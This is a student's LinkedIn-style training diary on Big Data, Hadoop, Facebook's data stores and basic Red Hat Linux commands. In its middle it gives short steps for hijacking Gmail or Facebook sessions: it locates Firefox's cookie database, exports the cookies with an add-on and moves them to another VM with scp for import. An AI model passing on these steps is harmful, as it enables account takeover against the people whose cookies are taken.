Pawar Suvarna
TSE at Suma Soft, IT Engineering Student | Gen AI ,Java, Python, SQL,C,C++,AWS,Docker,Linux,GitHub,NylasEmail Integration 2022 Graduation
In this month of september 2020 Trianing is start on Lots of Technology lots of Real base company requirement under the guidance of Mr.#Vimal daga sir.And in two days I learned lots of things.Lots of means its huge knowledge,really this platform is really good for each and everyone to learned new technology.
My Linkedln Account Link:
Introduction to Big Data and the different techniques employed to handle it such as Hadoop.
About 2.5 quintillion bytes of data is generated every day. Nonetheless, this number is just projected to constantly increase in the following years (90% of nowadays stored data has been produced within the last two years).
BigData is name of problem in Technology.This problem is due to big and vast amount of data.
What makes Big Data different from any other large amount of data stored in relational databases is its heterogeneity. The data comes from different sources and has been recorded using different formats.
Three different ways of formatting data are commonly employed:
- Unstructured = unorganised data (eg. videos).
- Semi-structured = the data is organised in a not fixed format (eg. JSON).
- Structured = the data is stored in a structured format (eg. RDBMS).
Big Data is defined by three properties:
- Volume = because of the large amount of data, storing data on a single machine is impossible. How can we process data across multiple machines assuring fault tolerance?
- Variety = How can we deal with data coming from varied sources which have been formatted using different schemas?
- Velocity = How can we quickly store and process new data?
Big Data can be analysed using two different processing techniques:
- Batch processing = usually used if we are concerned by the volume and variety of our data. We first store all the needed data and then process it in one go (this can lead to high latency). A common application example can be calculating monthly payroll summaries.
- Stream processing = usually employed if we are interested in fast response times. We process our data as soon as is received (low latency). An application example can be determining if a bank transaction is fraudulent or not.
Big Data can be processed using different tools such as MapReduce, Spark, Hadoop, Pig, Hive, Cassandra and Kafka. Each of these different tools has its advantages and disadvantages which determines how companies might decide to employ them.
How does facebook handle the 4+ petabyte of data generated per day? Cambridge Analytica - facebook data scandal.
Before moving on to Facebook, let’s take a look at a few points at why data indeed is considered as the new gold!
- Google gets over 3.5 billion searches daily.
- Google remains the highest shareholder of the search engine market, with 87.35% of the global search engine market share as of January 2020. Big Data stats for 2020 show that this translates into 1.2 trillion searches yearly, and more than 40,000 search queries per second.
- WhatsApp users exchange up to 65 billion messages daily.
- 5 million businesses are actively using the WhatsApp Business app to connect with their customers. There are over 1 billion WhatsApp groups worldwide?
- Internet users generate about 2.5 quintillion bytes of data each day.
- With the estimated amount of data we should have by 2020 (40 zettabytes), we have to ask ourselves what’s our part in creating all that data. So, how much data is generated every day? 2.5 quintillion bytes. Now, this number seems rather high, but if we look at it in zettabytes, i.e., 0.0025 zettabytes this doesn’t seem all that much. When we add to that the fact that in 2020 we should have 40 zettabytes, we’re generating data at a regular pace.
- By 2020, every person will generate 1.7 megabytes in just a second.
- In 2019, there are 2.3 billion active Facebook users, and they generate a lot of data.
How big is this data generated by Facebook?
Facebook generates 4 petabytes of data per day — that’s a million gigabytes. All that data is stored in what is known as the Hive, which contains about 300 petabytes of data. This enormous amount of content generation is without a doubt connected to the fact that Facebook users spend more time on the site than users spend on any other social network, putting in about an hour a day.
Facebook Big data challenges
Big data stores are the workhorses for data analysis at Facebook. They grow by millions of events (inserts) per second and process tens of petabytes and hundreds of thousands of queries per day. The three data stores used most heavily are:
1. ODS (Operational Data Store) stores 2 billion time series of counters. It is used most commonly in alerts and dashboards and for trouble-shooting system metrics with 1–5 minutes of time lag. There are about 40,000 queries per second.
2. Scuba is Facebook’s fast slice-and-dice data store. It stores thousands of tables in about 100 terabytes in memory. It ingests millions of new rows per second and deletes just as many. Throughput peaks around 100 queries per second, scanning 100 billion rows per second, with most response times under 1 second.
3. Hive is Facebook’s data warehouse, with 300 petabytes of data in 800,000 tables. Facebook generates 4 new petabyes of data and runs 600,000 queries and 1 million map-reduce jobs per day. Presto, HiveQL, Hadoop, and Giraph are the common query engines over Hive.
ODS, Scuba, and Hive share an important characteristic: none is a traditional relational database. They process data for analysis, not to serve users, so they do not need ACID guarantees for data storage or retrieval. Instead, challenges arise from high data insertion rates and massive data quantities.
Big data Analytics
Big data analytics is the often complex process of examining big data to uncover information — such as hidden patterns, correlations, market trends and customer preferences — that can help organizations make informed business decisions.
On a broad scale, data analytics technologies and techniques provide a means to analyze data sets and take away new information — which can help organizations make informed business decisions. Business intelligence (BI) queries answer basic questions about business operations and performance.
Why is it so important in any business?
Big data analytics through specialized systems and software can lead to positive business-related outcomes:
- New revenue opportunities
- More effective marketing
- Better customer service
- Improved operational efficiency
- Competitive advantages over rivals
Big data analytics applications allow data analysts, data scientists, predictive modelers, statisticians and other analytics professionals to analyze growing volumes of structured transaction data, plus other forms of data that are often left untapped by conventional BI and analytics programs.
How Big Data is Changing our World
Big Data has made a big impact on our world. Some of our most popular posts in our Top 50 Big Data list illuminate how Big Data is changing the way business is run as well as advancing new technology.
To solve this problem some technology used "Distributed storage".In distributed storage data are divided into small chunk or strives and send to slave.In this concept use master and slave concept.To develop this idea some Technology is used and the name of this technology is "Hadoop".
1. Editor’s pick: Big Data Industries: 5 Industries Being Reshaped by Data Analytics
Did you know that farmers are leveraging data analytics? See the other traditional industries where Big Data is making an impact.
2. Actually, It’s More than Actuarials: Big Data for Insurance
3. Big Data vs. Market Research: Which Can Increase Your Business Intelligence?
4. Big Data Meets the Little Drone
6. How Big Data is Transforming the World of Finance
Hadoop is a set of open source programs written in Java which can be used to perform operations on a large amount of data. Hadoop is a scalable, distributed and fault tolerant ecosystem. The main components of Hadoop are :
- Hadoop YARN = manages and schedules the resources of the system, dividing the workload on a cluster of machines.
- Hadoop Distributed File System (HDFS) = is a clustered file storage system which is designed to be fault-tolerant, offer high throughput and high bandwidth. It is additionally able to store any type of data in any possible format.
- Hadoop MapReduce = is used for loading the data from a database, formatting it and performing a quantitative analysis on it.
Some application examples of Hadoop are: search (eg. Yahoo), log processing/Data warehouse (eg. Facebook) and Video/Image Analysis (eg. New York Times).
Hadoop has traditionally been the first system to make MapReduce available on a large scale, although Apache Spark is nowadays the framework of preference by many companies thanks to it’s greater execution speed.
A Day In The Life Of A Hadoop Administrator
The life of a Hadoop Administrator revolves around creating, managing and monitoring the Hadoop Cluster. However, cluster administration is not a consistent activity practiced through and through by administrators from around the globe. The main variable in this case is the “Distribution of Hadoop” or in simple words a ‘cluster’ based where you choose the cluster monitoring tools. The different distributions of Hadoop are Cloudera, Hortonworks, Apache and MapR. Apache distribution is of course the Open source Hadoop distribution.
As an administrator, if I want to setup a Hadoop cluster on the Hortonworks/Cloudera distribution, my job will be simple because all the configurations files will be present on startup. However, in the case of the open source Apache distribution of Hadoop, we have to manually setup all the configurations such as Core-Site, HDFS-Site, YARN-Site and MapRed-Site.
Once we have created the cluster, we have to ensure that the Cluster is active and available at all times. For this, all the nodes in the cluster have to be setup. They are NameNode, DataNode, Active & Standby NameNode, Resource Manager and the Node Manager.
NameNode is the Heart of the cluster. It consists of Metadata, which helps the cluster to recognize the data and coordinate all the activities. Since a lot depends on the NameNode, we have to ensure 100% reliability and for this, we have something called the Standby NameNode which acts as the backup for the Active NameNode. NameNode stores the Metadata, while the actual data is stored in the DataNode in the form of Blocks. The Resource Manager takes care of the cluster’s CPU and memory resources at all times for all the Jobs while the Application Master manages the actual jobs.
If all the above services are running and are active at all times, your Hadoop Cluster is ready for use.
When setting up the Hadoop Cluster, the administrator will also need to decide the cluster size based on the amount of data that is to be stored in the HDFS. Since the replication factor of HDFS is 3, 15 TB of free space is required to store 5 TB of data in the Hadoop cluster. The replication factor is set at 3 in order to increase the Redundancy and Reliability. Cluster growth based on storage capacity is a very effective technique that is implemented in the clusters. We can add new systems to the existing cluster and thereby increase the storage space any number of times.
Another important activity we have to perform as a Hadoop Administrator is that we have to monitor the cluster on a regular basis. We monitor the Cluster to ensure that it is up and running at all times and to keep track of the performance. Clusters can be monitored using the various cluster monitoring tools. We choose the appropriate cluster monitoring tools based on the distribution of Hadoop that you are using.
The monitoring tools for the appropriate distribution of Hadoop are:
Open Source Hadoop/Apache Hadoop à Nagios/ Ganglia/Ambari/ Shell scripting/Python Scripting
Cloudera Hadoop à Cloudera Manager + Open Source Hadoop tools
Hortonworks à Apache Ambari + Open Source Hadoop tools
Important topic which is learned in only Two days:
#Learn new idea : If we have to install any software in our laptop we required operating system.
2.Three important things which is very important which are 'CPU','RAM',and'H.D'.
3.Limitation in pc/laptop HD/CPU/RAM are to boot onlyone os but some tricks are used which is using "virtulization"
4.An important thing is when we install any os we require os image.
5.we learned also how to install redhat8 in virtual box in detail.
6.ISO image is require to download redhat8.
7.Also learn about CLI(command line interface) and GUI(Graphical use interface).
8.In red hat8 learned "which" command is used to show the location of any file.
#Wow topic of the day is how to break the gmail account without knowing the username and password.
-cookie is most important part of this topic.
-to read any data in cookie we know about the sqlite database.
-Every language is optimized for certain idea and every software/program is installed on operating sytem.
-Data is stored in RAM i.e Memory .
-RAM and CPU are termed as Compute unit.
-if we want to store Peristent or permanent data , Hard Disk is a Storage unit to store permanently.
-The limitation of RAM/CPU/H.D is we can only boot one operating system at a time.
-Here virtualization comes in play we can launch multiple operating system.
-boot is used to start the O.S , for booting we need to have RAM/CPU.
8.To install redhat operating system minimum requirement is to have image of the O.S.
-RHEL created is known as virtual machine or Guest Operating system.
-Program mainly has two interfaces:
1.GUI (Graphical User Interface)
2.CLI (Command Line Interface)
Step 1
cd $HOME/.mozilla : here I am using CD command that stands for change directory to go inside any of the folder or directory.
Step 2
ls : this command is used as a list to show how many folder we have in that particular directory.
Step 3
cd /firefox : now I am going to the Firefox folder.
Step 4
ls : to list how many folders are there in the Firefox folder.
Step 5
cd /default profile : to go inside the default profile folder.
Step 6
ls : that show us cookies file in a database form sqlite.
7. Add-ons Concept : for converting the cookie sqlite file into the normal text we have to use the add ons. We are Using cookie bro cookie manager add-on. And one thing remember cookie is so much critical. cookie bro help us to export the JSON file and we can read cookie and crack Gmail or Facebook raw data and copy it into some text files such as in my case I am copying it into a cookiefile.txt .
Note : ifconfig : this command show IP of the system. scp IP 1:cookiefile.txt IP2:newcookiefile.txt~ for transferring the data from one VM to other we are using SCP command. Then in different VM we can open the Firefox and import the add-on file as newcookiefile.txt and easily crack the Gmail.
#Learning points:programe is nothing but coding.we can not store the data without any file.os gives to interfaces GUI and CLI.using cli we can interact with operating system.cmd prompt can run one prg at a time.ctrl+c is used to terminate the prg and ctrl+z is used to paused the cmd is used to how many prg are there running in os.fg cmd is used to resume the prg.mkrdir is used to create new cmd is used to check the dir is create or not or list of files.useradd cmd is used to create new account.ctrl+alt+fun3 is used to login another is like editor.In vi 'i' cmd is used to insert open insert mode.:w:q is used to save the file and exit the file respectively .In vi prg y is used to copy the file and p is used to paste the file .In redhat8 terminal .when we open any prg whatever type in prg it only upload store in ram,not on hardisk.
#Wow_topic:BigData .it is name of problem in technology.under bigdata volume and velocity is big technology is comeup to solve this problem and which is #"Distributed Stroage" .
#Hadoop is software used to implement this technology.
#Real time this application in to store social media information.
One of the reason,the big companies are running their business is due to data.
Everyday Facebook is receiving a big amount of data approx 500TB/day.
What is big data?
BIG DATA is not at all a technology. It is the name of the PROBLEM that we face in the data world.
Some sub problems of big data :
VOLUME : capacity to store i.e. size
VELOCITY : I/O operations
One of the TECHNOLOGY/CONCEPT come up to solve atleast these two problems is DISTRIBUTED STORAGE. It is the core of all the issues related to big data world.
Difference between resources that COMPANY USES and that we GENERALLY USE.
* In case of company usage, resources are reliable. But in general its not reliable. In case of the one which we use if harddisk crash,data is lost.
* Same size of HD but cost is different. For company usage, its costly.
In case of general usage,its cheap
* Company usage are typically called SERVER. The ones that we use are called COMMODITY HARDWARES.
Detailed study of distributed Storage Concept. How it works and how it solves VOLUME, VELOCITY and COST problems of big data.
DISTRIBUTED STORAGE is the CONCEPT name. To IMPLEMENT any Concept we need a PRODUCT/SOFTWARE. One of the core software that companies use is HADOOP.
Some of the pratical pictures:
In the following figure Shows a Structure of virtual box.It is Virtual Box where we can install many operating system .At a time we can also run multiple operating system.
In above fig shows a terminal(CLI) which is used to interact with operating system.
In above fig shows the basic command of Redhat8 linux.
In above fig shows a varation of RAM first when in any file has no data then Ram size is less but when we enter some data in file then ram size willbe increase.
In above fig shows how to create a new directory.and how to see list of files and also see file will be created or not.
In fig Show when we press a ctr+z then prg is not terminated they pause the prg.and when we pause the programe and goto nest cli then using job cmd we see which prg is running or stop.this prg is resume using fg command.the "+"sign indicate the priority of prg,that means +sign indicate they run first and then next prg run.
In above fig show the last cmd is used to see a all code of the redhat8 linux also called a opensourse operating system due to this reason.
So thats all this topic i learn in only two day.i really exited to fucture classes.Thanku so much Mr.#Vimal daga sir.
#bigdata #hadoop #bigdatamanagement #arthbylw #vimaldaga #righteducation #educationredefine #rightmentor #worldrecordholder #ARTH #linuxworld #makingindiafutureready #righeudcation
Infoscian | Ex-TCSer | Ex-Merkle | Digital Marketing | AEC | Adobe Campaign Classic Developer | ACM | AEP | AJO | Adobe RT-CDP | Adobe CJA | Agile Model | Confluence | Jira | Python | C Prog | Unix | REST API | SQL | ML
4 年nice